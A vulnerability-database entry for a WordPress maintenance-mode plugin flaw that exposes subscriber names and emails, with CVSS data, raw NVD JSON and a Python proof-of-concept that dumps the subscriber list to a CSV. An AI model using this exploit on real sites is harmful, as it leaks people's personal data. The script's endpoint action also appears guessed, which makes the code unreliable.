Security Vulnerability Report
中文
CVE-2025-10638 CVSS 5.3 MEDIUM

CVE-2025-10638

Published: 2025-10-22 06:15:31
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The NS Maintenance Mode for WP WordPress plugin through 1.3.1 lacks authorization in its subscriber export function allowing unauthenticated attackers to download a list of a site's subscribers containing their name and email address

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

NS Maintenance Mode for WP <= 1.3.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-10638 - NS Maintenance Mode for WP Unauthenticated Subscriber Export PoC # Affected: NS Maintenance Mode for WP plugin <= 1.3.1 # Author: Security Researcher # Description: Exploits missing authorization in subscriber export function import requests import sys # Target WordPress site URL TARGET_URL = sys.argv[1] if len(sys.argv) > 1 else "http://target-wordpress-site.com" # The subscriber export endpoint (typical WordPress admin-ajax.php or plugin-specific endpoint) EXPORT_ENDPOINT = f"{TARGET_URL}/wp-admin/admin-ajax.php" # Action parameter for the subscriber export function # The plugin's export function lacks proper capability checks PAYLOAD = { "action": "ns_maintenance_mode_export_subscribers" } def exploit(url): """ Exploit the missing authorization vulnerability to dump subscriber list. No authentication required - works against unauthenticated attackers. """ print(f"[*] Targeting: {url}") print(f"[*] Sending unauthenticated request to subscriber export endpoint...") try: # Send unauthenticated POST request to trigger the export response = requests.post( EXPORT_ENDPOINT, data=PAYLOAD, timeout=10, allow_redirects=False ) if response.status_code == 200 and len(response.content) > 0: print(f"[+] Vulnerability confirmed! Status: {response.status_code}") print(f"[+] Subscriber data leaked ({len(response.content)} bytes):") print("-" * 60) print(response.text) print("-" * 60) # Save leaked data to file with open("leaked_subscribers.csv", "w") as f: f.write(response.text) print("[+] Data saved to: leaked_subscribers.csv") return True else: print(f"[-] Export failed. Status code: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Request error: {e}") return False if __name__ == "__main__": print("=" * 60) print("CVE-2025-10638 PoC - NS Maintenance Mode Subscriber Export") print("=" * 60) exploit(TARGET_URL)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-10638", "sourceIdentifier": "[email protected]", "published": "2025-10-22T06:15:30.593", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The NS Maintenance Mode for WP WordPress plugin through 1.3.1 lacks authorization in its subscriber export function allowing unauthenticated attackers to download a list of a site's subscribers containing their name and email address"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "references": [{"url": "https://wpscan.com/vulnerability/1998a079-d986-47fe-907f-d4d295b06603/", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.